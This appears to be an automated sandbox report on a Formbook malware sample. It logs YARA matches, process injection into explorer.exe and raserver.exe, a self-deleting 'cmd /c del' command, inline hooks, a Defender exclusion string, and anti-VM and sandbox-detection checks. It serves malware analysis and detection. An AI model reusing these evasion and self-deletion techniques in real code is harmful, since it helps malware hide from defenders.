          Source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: XhU4EXUp0x.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@2/2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XhU4EXUp0x.exe.logJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeMutant created: \Sessions\1\BaseNamedObjects\zheXInonhS
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2216:120:WilError_01
          Source: XhU4EXUp0x.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: XhU4EXUp0x.exeVirustotal: Detection: 21%
          Source: XhU4EXUp0x.exeReversingLabs: Detection: 26%
          Source: unknownProcess created: C:\Users\user\Desktop\XhU4EXUp0x.exe 'C:\Users\user\Desktop\XhU4EXUp0x.exe'
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess created: C:\Users\user\Desktop\XhU4EXUp0x.exe C:\Users\user\Desktop\XhU4EXUp0x.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess created: C:\Users\user\Desktop\XhU4EXUp0x.exe C:\Users\user\Desktop\XhU4EXUp0x.exeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe'Jump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: XhU4EXUp0x.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: XhU4EXUp0x.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: XhU4EXUp0x.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.669343721.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\YfQkSBryuS\src\obj\Debug\ProfileOptimization.pdb source: XhU4EXUp0x.exe
          Source: Binary string: wntdll.pdbUGP source: XhU4EXUp0x.exe, 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, raserver.exe, 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: XhU4EXUp0x.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: XhU4EXUp0x.exe, 00000003.00000002.707590458.000000000169A000.00000004.00000020.sdmp
          Source: Binary string: RAServer.pdbGCTL source: XhU4EXUp0x.exe, 00000003.00000002.707590458.000000000169A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.669343721.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B5AC80 pushfd ; retn 0004h0_2_00B5AC82
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B5ACD1 pushfd ; retn 0004h0_2_00B5ACD2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B5AC31 pushfd ; retn 0004h0_2_00B5AC32
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B5B1C0 pushfd ; retn 0004h0_2_00B5B1D2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B53768 push eax; retn 0004h0_2_00B53769
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E944C push esp; iretd 0_2_0B4E944E
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041D069 push esi; ret 3_2_0041D067
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_004080F7 pushad ; retf 3_2_004080FC
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_004169CD push ecx; iretd 3_2_004169D4
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_004169F6 push eax; iretd 3_2_004169F7
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041DA38 push esi; ret 3_2_0041D067
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0040E2FF push ds; retf 3_2_0040E326
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041DA97 push esi; ret 3_2_0041D067
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00417ABB push ebx; iretd 3_2_00417ABC
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041833A push cs; retf 3_2_0041833D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_004164C5 push es; retf 3_2_004164CA
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041D4FB push esi; ret 3_2_0041D067
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041D5C9 push esi; ret 3_2_0041D067
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041CEF2 push eax; ret 3_2_0041CEF8
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041CEFB push eax; ret 3_2_0041CF62
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041CEA5 push eax; ret 3_2_0041CEF8
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041CF5C push eax; ret 3_2_0041CF62
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041D7F1 push esi; ret 3_2_0041D067
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041CF89 push esi; ret 3_2_0041D067
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041CF96 push esi; ret 3_2_0041D067
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019AD0D1 push ecx; ret 3_2_019AD0E4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B5D0D1 push ecx; ret 12_2_04B5D0E4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00A980F7 pushad ; retf 12_2_00A980FC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AAD069 push esi; ret 12_2_00AAD067
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA69F6 push eax; iretd 12_2_00AA69F7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA69CD push ecx; iretd 12_2_00AA69D4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.68116376135

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: XhU4EXUp0x.exe PID: 6968, type: MEMORY
          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000A998E4 second address: 0000000000A998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000A99B4E second address: 0000000000A99B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: IdentifierJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0Jump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00409A80 rdtsc 3_2_00409A80
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe TID: 6972Thread sleep time: -104441s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe TID: 7020Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe TID: 2016Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 3220Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6964Thread sleep time: -65000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread delayed: delay time: 104441Jump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000005.00000000.680569789.000000000A868000.00000004.00000001.sdmpBinary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI`=
          Source: XhU4EXUp0x.exe, 00000000.00000002.653357371.0000000000A9F000.00000004.00000020.sdmpBinary or memory string: VMware
          Source: explorer.exe, 00000005.00000000.669123730.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.676990753.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.677547132.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.677547132.000000000A716000.00000004.00000001.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&d
          Source: explorer.exe, 00000005.00000000.697429263.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.677547132.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: XhU4EXUp0x.exe, 00000000.00000002.653357371.0000000000A9F000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareCWYACNw
          Source: explorer.exe, 00000005.00000000.669123730.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: explorer.exe, 00000005.00000000.677896891.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: XhU4EXUp0x.exe, 00000000.00000002.653357371.0000000000A9F000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareCWYACNDAWin32_VideoController92RGKB5VVideoController120060621000000.000000-00068978660display.infMSBDACRVZ4Z54PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsAXM45XBV>K
          Source: explorer.exe, 00000005.00000000.676990753.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.669704877.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.669123730.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.669123730.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00409A80 rdtsc 3_2_00409A80
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0040ACC0 LdrLoadDll,3_2_0040ACC0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A149A4 mov eax, dword ptr fs:[00000030h]3_2_01A149A4
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A149A4 mov eax, dword ptr fs:[00000030h]3_2_01A149A4
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A149A4 mov eax, dword ptr fs:[00000030h]3_2_01A149A4
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A149A4 mov eax, dword ptr fs:[00000030h]3_2_01A149A4
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982990 mov eax, dword ptr fs:[00000030h]3_2_01982990
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197C182 mov eax, dword ptr fs:[00000030h]3_2_0197C182
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198A185 mov eax, dword ptr fs:[00000030h]3_2_0198A185
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D51BE mov eax, dword ptr fs:[00000030h]3_2_019D51BE
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D51BE mov eax, dword ptr fs:[00000030h]3_2_019D51BE
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D51BE mov eax, dword ptr fs:[00000030h]3_2_019D51BE
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D51BE mov eax, dword ptr fs:[00000030h]3_2_019D51BE
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]3_2_019799BF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]3_2_019799BF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov eax, dword ptr fs:[00000030h]3_2_019799BF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]3_2_019799BF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]3_2_019799BF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov eax, dword ptr fs:[00000030h]3_2_019799BF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]3_2_019799BF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]3_2_019799BF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov eax, dword ptr fs:[00000030h]3_2_019799BF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]3_2_019799BF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]3_2_019799BF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov eax, dword ptr fs:[00000030h]3_2_019799BF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019861A0 mov eax, dword ptr fs:[00000030h]3_2_019861A0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019861A0 mov eax, dword ptr fs:[00000030h]3_2_019861A0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D69A6 mov eax, dword ptr fs:[00000030h]3_2_019D69A6
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195B1E1 mov eax, dword ptr fs:[00000030h]3_2_0195B1E1
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195B1E1 mov eax, dword ptr fs:[00000030h]3_2_0195B1E1
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195B1E1 mov eax, dword ptr fs:[00000030h]3_2_0195B1E1
